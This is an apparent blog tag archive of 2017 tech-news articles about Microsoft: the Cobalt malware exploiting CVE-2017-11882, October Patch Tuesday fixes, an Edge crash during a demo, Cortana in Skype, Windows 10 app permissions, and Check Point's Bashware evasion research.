Tag Archives: Microsoft

Hackers Exploit Recently Disclosed Microsoft Office Bug to Backdoor PCs


A recently disclosed severe 17-year-old vulnerability in Microsoft Office that lets hackers install malware on targeted computers without user interaction is now being exploited in the wild to distribute a backdoor malware.

First spotted by researchers at security firm Fortinet, the malware has been dubbed Cobalt because it uses a component from a powerful and legitimate penetration testing tool, called Cobalt Strike.

Cobalt Strike is a form of software developed for Red Team Operations and Adversary Simulations for accessing covert channels of a system.

The vulnerability (CVE-2017-11882) that Cobalt malware utilizes to deliver the backdoor is a memory-corruption issue that allows unauthenticated, remote attackers to execute malicious code on the targeted system when opened a malicious file and potentially take full control over it.

This vulnerability impacts all versions of Microsoft Office and Windows operating system, though Microsoft has already released a patch update to address the issue. You can read more details and impact of the vulnerability in our previous article.


Since cybercriminals are quite quick in taking advantage of newly disclosed vulnerabilities, the threat actors started delivering Cobalt malware using the CVE-2017-11882 exploit via spam just a few days after its disclosure.

According to Fortinet researchers, the Cobalt malware is delivered through spam emails, which disguised as a notification from Visa regarding rule changes in Russia, with an attachment that includes a malicious RTF document, as shown.

The email also contains a password-protected archive with login credentials provided in the email to unlock it in order to trick victims into believing that the email came from the legitimate financial service.

“This is [also] to prevent auto-analysis systems from extracting the malicious files for sandboxing and detection,” Fortinet researchers Jasper Manual and Joie Salvio wrote.

“Since a copy of the malicious document is out in the open… so it’s possible that this is only to trick the user into thinking that securities are in place, which is something one would expect in an email from a widely used financial service.”

Once the document is opened, the user has displayed a plain document with the words “Enable Editing.” However, a PowerShell script silently executes in the background, which eventually downloads a Cobalt Strike client to take control of the victim’s machine.

With control of the victim’s system, hackers can “initiate lateral movement procedures in the network by executing a wide array of commands,” the researchers said.

According to the researchers, cybercriminals are always in look for such vulnerabilities to exploit them for their malware campaigns, and due to ignoring software updates, a significant number of users out there left their systems unpatched, making them vulnerable to such attacks.

The best way to protect your computer against the Cobalt malware attack is to download the patch for the CVE-2017-11882 vulnerability and update your systems immediately.

Microsoft Patches 20 Critical Vulnerabilities

This month, Microsoft’s Patch Tuesday updates tackle fixes for 53 security bugs in Windows, Office, Internet Explorer, Edge, ASP.NET Core, .NET Core, and its Chackra Core browser engine.

Read More

Microsoft Provides Guidance on Mitigating DDE Attacks

Microsoft published guidance for Windows admins on how to safely disable Dynamic Data Exchange (DDE) fields in Office that are being used to spread malware in email-based attacks.

Read More

Microsoft Engineer Installs Google Chrome Mid-Presentation After Edge Kept Crashing


Ever since the launch of Windows 10, Microsoft has been heavily pushing its Edge browser, claiming it to be the best web browser over its competitors like Mozilla Firefox, Opera and Google Chrome in terms of speed and battery performance.

However, Microsoft must admit that most users make use of Edge or Internet Explorer only to download Chrome, which is by far the world’s most popular internet browser.

Something hilarious happened recently during a live demonstration when a Microsoft engineer caught on a video switching from Edge to Chrome after the default Windows 10 browser stopped responding in the middle of the presentation.

That is really embarrassing.

The incident happened in the middle of a Microsoft Ignite conference, where the Microsoft presenter Michael Leworthy was demonstrating how to one can migrate their applications and data to Microsoft Azure cloud service.

See what happens in the video below:

However, Leworthy was forced to pause his Azure presentation in the middle of live demo session to download and install Google’s Chrome because the company’s Edge browser kept on crashing.

Guess what? This somewhat embarrassing and somewhat hilarious incident was recorded and uploaded to YouTube by Microsoft itself. You can check out the video yourself.

“I love it when demos break,” Leworthy said. “So while we’re talking here, I’m gonna go install Chrome,” he continued and started laughing, with many people in the audience giggling and cheering.

“And we’re not going to make Google better,” Leworthy added as he refused to check the box that sends crash reports and statistics back to Google.

Although Internet Explorer has long been considered to be “the best browser to download Google Chrome,” Microsoft Edge came out to be a competent successor to do the same thing even faster, as Leworthy took less than a minute to download and install Chrome.

Microsoft Issues Patches For Severe Flaws, Including Office Zero-Day & DNS Attack


As part of its “October Patch Tuesday,” Microsoft has today released a large batch of security updates to patch a total of 62 vulnerabilities in its products, including a severe MS office zero-day flaw that has been exploited in the wild.

Security updates also include patches for Microsoft Windows operating systems, Internet Explorer, Microsoft Edge, Skype, Microsoft Lync and Microsoft SharePoint Server.

Besides the MS Office vulnerability, the company has also addressed two other publicly disclosed (but not yet targeted in the wild) vulnerabilities that affect the SharePoint Server and the Windows Subsystem for Linux.

October patch Tuesday also fixes a critical Windows DNS vulnerability that could be exploited by a malicious DNS server to execute arbitrary code on the targeted system. Below you can find a brief technical explanation of all above mentioned critical and important vulnerabilities.

Microsoft Office Memory Corruption Vulnerability (CVE-2017-11826)

This vulnerability, classified by Microsoft as “important,” is caused by a memory corruption issue. It affects all supported versions of MS Office and has been actively exploited by the attackers in targeted attacks.

An attacker could exploit this vulnerability either by sending a specially crafted Microsoft Office file to the victims and convincing them to open it, or hosting a site containing specially crafted files and tricking victims to visit it.

Once opened, the malicious code within the booby-trapped Office file will execute with the same rights as the logged-in user. So, users with least privilege on their systems are less impacted than those having higher admin rights.

The vulnerability was reported to Microsoft by security researchers at China-based security firm Qihoo 360 Core Security, who initially detected an in-the-wild cyber attack which involved malicious RTF files and leveraged this vulnerability on September 28.

Microsoft Windows DNSAPI Remote Code Execution Vulnerability (CVE-2017-11779)

Among other critical vulnerabilities patched by Microsoft include a critical remote code execution flaw in the Windows DNS client that affects computers running Windows 8.1 and Windows 10, and Windows Server 2012 through 2016.

The vulnerability can be triggered by a malicious DNS response, allowing an attacker gain arbitrary code execution on Windows clients or Windows Server installations in the context of the software application that made the DNS request.

Nick Freeman, a security researcher from security firm Bishop Fox, discovered the vulnerability and demonstrated how an attacker connected to a public Wi-Fi network could run malicious code on a victim’s machine, escalate privileges and take full control over the target computer or server.

“This means that if an attacker controls your DNS server (e.g., through a Man-in-the-Middle attack or a malicious coffee-shop hotspot) – they can gain access to your system,” the researcher explains.

“This doesn’t only affect web browsers – your computer makes DNS queries in the background all the time, and any query can be responded to in order to trigger this issue.”

For full technical details, you can watch the video demonstration by Bishop Fox’s Dan Petro and head on to Bishop Fox’s blog post.

Windows Subsystem for Linux Denial of Service Vulnerability (CVE-2017-8703)

This denial of service (DoS) issue is yet another noteworthy vulnerability which resides in Windows Subsystem for Linux.

The vulnerability, classified by Microsoft as “important,” was previously publicly disclosed, but wasn’t found actively exploited in the wild.

The vulnerability could allow an attacker to execute a malicious application to affect an object in the memory, which eventually allows that the application to crash the target system and made it unresponsive.

The only affected Microsoft product by this vulnerability is Windows 10 (Version 1703). “The update addresses the vulnerability by correcting how Windows Subsystem for Linux handles objects in memory,” Microsoft said in its advisory.

Microsoft Office SharePoint XSS Vulnerability (CVE-2017-11777)

Another previously disclosed but not yet under attack vulnerability is a cross-site scripting (XSS) flaw in Microsoft SharePoint Server that affects SharePoint Enterprise Server 2013 Service Pack 1 and SharePoint Enterprise Server 2016.

The vulnerability, also classified by Microsoft as “important,” can be exploited by sending a maliciously crafted request to an affected SharePoint server.

Successful exploitation of this vulnerability could allow an attacker to perform cross-site scripting attacks on affected systems and execute malicious script in the same security context of the current user.

“The attacks could allow the attacker to read content that the attacker is not authorised to read, use the victim’s identity to take actions on the SharePoint site on behalf of the user, such as change permissions and delete content, and inject malicious content in the browser of the user,” Microsoft explains.

Besides these, the company has patched a total of 19 vulnerabilities in the scripting engine in Edge and Internet Explorer that could allow web pages to achieve remote-code execution, with the logged-in user’s permissions, via memory corruption flaws.

Just opening a web page could potentially land you in trouble by executing malware, spyware, ransomware, and other nasty software on the vulnerable computer.

More RCE And Other Vulnerabilities

Redmond also patched two vulnerabilities in the Windows font library that can allow a web page or document to execute malicious code on a vulnerable machine and hijack it on opening a file with a specially crafted embedded font or visiting a website hosting the malicious file.

The update also includes fixes for a bug in Windows TRIE (CVE-2017-11769) that allows DLL files to achieve remote code execution, a programming error (CVE-2017-11776) in Outlook that leaves its emails open to snooping over supposedly secure connections.

Other issues patched this month include two remote code execution flaws in the Windows Shell and a remote code execution bug in Windows Search.

Microsoft also published an advisory warning user of a security feature bypass issue affecting the firmware of Infineon Trusted Platform Modules (TPMs).

Surprisingly, Adobe Flash does not include any security patches. Meanwhile, Adobe has skipped October’s Patch Tuesday altogether.

Users are strongly advised to apply October security patches as soon as possible in order to keep hackers and cybercriminals away from taking control over their computers.

For installing security updates, simply head on to Settings → Update & security → Windows Update → Check for updates, or you can install the updates manually.

Powered by WPeMatico

Microsoft Cortana Can Now Read Your Skype Messages to Make Chat Smarter


Microsoft today announced built-in support for Cortana—an artificial intelligence-powered smart assistant—in Skype messenger on Android as well as iOS devices.

What purpose does it serve?

Microsoft wants its AI-based smart assistance to understand your conversations and help you with quick suggestions, ideas and information right inside your chat window.

“Cortana can also help you organize your day—no need to leave your conversations. Cortana can detect when you’re talking about scheduling events or things you have to do and will recommend setting up a reminder, which you will receive on all your devices that have Cortana enabled,” Skype said in a blog post.


In other words, it typically means — Microsoft’s Cortana can now read your private Skype conversations.

Should You Worry About Your Privacy?

Yes, Cortana needs continuous monitoring of your private chats in order to come up with useful suggestions such as movie bookings, travel plans, nearby restaurants, scheduled meetings and so on.

Obviously, this feature would be a severe concern for privacy-conscious people, knowing that someone else is continuously reading their private conversations with their friends or family or secret business plans with their colleagues even if Cortana has good intentions.

So should you be worried about this? It depends.

The answer is—NO for those who are already using Skype. Since conversations over skype are not end-to-end encrypted, Microsoft already has access to all your private communications in plain text, and you have nothing to hide from the company.

The answer is—YES for those who are new to Skype and impressed with the idea of artificial intelligence-based smart assistant but care more about their privacy.

How to Activate Cortana for Intelligent Skype Chats?

Currently, Cortana support for Skype is only available for American users, and it is optional, and you need to turn the assistant on your mobile device manually.

To activate and allow Cortana to read all your chats and help you intelligently, you need to follow the below steps:

  • Upgrade to latest version of Skype for Android or iOS
  • Tap on Cortana from your chat window
  • Start chatting with her, and it will ask for one-time permissions
  • Select Agree, and that is it.

In-chat assistance is not a new concept. Google Allo and Facebook messenger app have already introduced AI-based personal assistant for chats, but naturally, these features come with privacy trade-offs.

Despite being opt-in, these intelligent in-chat assistants, including Cortana for Skype, could be easily used to spy on your interests for targeted advertisements.

Do you feel it is worth the risk to have AI-based quick replies and suggestion for calendar entries?

Let us know in the comments below.

Powered by WPeMatico

Windows 10 to Give More Control Over App-level Permissions


Microsoft has been gradually changing its privacy settings in Windows 10 with the Fall Creators Update to give its users more controls over their data.

In April, Microsoft addressed some initial privacy concerns in the Windows 10 Creators Update with simplified data collection levels—Security, Basic, Enhanced, and Full—and eventually revealed its data collection practices.

Now, the software giant is making another privacy-related change with the upcoming Windows 10 Fall Creators Update, which is due for release in October 2017, giving you much more control over what apps can do with your device.

Just like apps on your smartphone’s app store, apps on Windows Store also require permission to access your computer’s critical functionalities like camera, microphone, calendar, contacts, and music, pictures and video libraries.

While Android and iOS allow you to limit an app’s permissions to access these sensitive things, these permissions have currently been provided to all apps implicitly in the Fall Creators Update, except for access to location data that needs an explicit user permit.

But that’s going to be changed.

For each new app installed on the Windows 10 Fall Creators Update, the operating system will prompt users for access to their device’s camera, microphone, contacts, calendar, and images and other information, requiring an explicit opt-in for each app.

“Starting with the Fall Creators Update, we’re extending this experience to other device capabilities for apps you install through the Windows Store,” Microsoft wrote in a post detailing the privacy improvements.

“You will be prompted to provide permission before an app can access key device capabilities or information such as your camera, microphone, contacts, and calendar, among others. This way you can choose which apps can access information from specific features on your device.”

However, when users install the Fall Creators Update, existing applications on their device will retain their permissions, but new apps installed from the official Windows Store will require their access to be enabled explicitly.

In order to review and manage your existing app permissions, head on to Start → Settings → Privacy. To learn more about Windows app permissions, head on to this link.

Microsoft is set to test these privacy changes with Windows Insiders shortly. The Windows 10 Fall Creators Update will be released on October 17th.

Powered by WPeMatico

Linux Subsystem on Windows 10 Allows Malware to Become Fully Undetectable


Microsoft has been expressing its love for Linux for almost three years now, and this love costs Microsoft an arm and a leg.

Last year, Microsoft surprised everyone by announcing the arrival of Windows Subsystem for Linux (WSL) in Windows 10, which brings the Linux command-line shell to Windows, allowing users to run native Linux applications on Windows system without virtualization.

However, security researchers from security firm Check Point Software Technologies have discovered a potential security issue with the WSL feature that could allow malware families designed for Linux target Windows computers—undetected by all current security software.

The researchers devised a new attack technique, dubbed Bashware, that takes advantage of Windows’ built-in WSL feature, which is now out of beta and is set to arrive in the Windows 10 Fall Creators Update in October 2017.

Bashware Attack Undetectable by All Anti-Virus & Security Solutions

According to CheckPoint researchers, the Bashware attack technique could be abused even by a known Linux malware family, because security solutions for Windows are not designed to detect such threats.

This new attack could allow an attacker to hide any Linux malware from even the most common security solutions, including next generation anti-virus software, malware inspection tools, anti-ransomware solution and other tools.

But why so? Researchers argue that existing security software packages for Windows systems have not yet been modified to monitor processes of Linux executables running on Windows operating system.

“Existing security solutions are still not adapted to monitor processes of Linux executables running on Windows OS, a hybrid concept which allows a combination of Linux and Windows systems to run at the same time,” Check Point researchers say. 

“This may open a door for cyber criminals wishing to run their malicious code undetected, and allow them to use the features provided by WSL to hide from security products that have not yet integrated the proper detection mechanisms.”

Who is the Culprit? Microsoft or Security Vendors?

In order to run the target Linux application in an isolated environment, Microsoft introduced “Pico processes“—containers that allow running of ELF binaries on the Windows operating system.

During their tests, the Check Point researchers were able to test the Bashware attack on “most of the leading antivirus and security products on the market,” and successfully bypass all of them.

It is because no security product monitors Pico processes, even when Microsoft already provides Pico API, a special application programming interface that can be used by security companies to monitor such processes.

“Bashware does not leverage any logic or implementation flaws in WSL’s design. In fact, WSL seems to be well designed,” the researchers concluded. 

“What allows Bashware to operate the way it does is the lack of awareness by various security vendors, due to the fact that this technology is relatively new and expands the known borders of the Windows operating system.”

Bashware Attackers Requires Admin Rights—Is that Hard on Windows PC?

Yes, Bashware requires administrator access on the target computers, but gaining admin privileges on Windows PCs via phishing attacks and/or stolen admin credentials is not a difficult task for a motivated attacker.

However, these additional attacks could also alert antivirus and security products, subverting the attack before the actual Bashware attack can be executed to hide malware.

Since WSL is not turned on by default, and users are required to manually activate “development mode” on their computer systems in order to use it and reboot the system, the risks posed by the feature are mitigated to some extent.

However, the Check Point researchers say it is a little-known fact that the developer mode can be enabled by modifying a few registry keys, which can be done silently in the background by the attackers with the right privileges.

The Bashware attack technique automates the required procedures by silently loading the WSL components, enabling developer mode, even downloading and extracting the Linux file system from Microsoft’s servers, and running malware.

No Need to Write Separate Malware Programs

What’s interesting about Bashware? Hackers using Bashware are not required to write malware programs for Linux to run them through WSL on Windows computers.

This extra effort is saved by the Bashware technique which installs a program called Wine inside the downloaded Ubuntu user-space environment, and then launches known Windows malware through it.

The malware then initiates into Windows as pico processes, which will hide it from security software.

400 Million Computers Potentially Exposed to Bashware

The newly discovered attack technique does not leverage any implementation of WSL vulnerability, but is due to the lack of interest and awareness by various security vendors towards WSL.

Since the Linux shell is now available to Windows users, researchers believe that Bashware can potentially affect any of the 400 million PCs currently running Windows 10 across the world.

Check Point researchers said their company had already upgraded its security solutions to combat such attacks and are urging other security vendors to modify and update their next-generation anti-virus and security solutions accordingly.

Powered by WPeMatico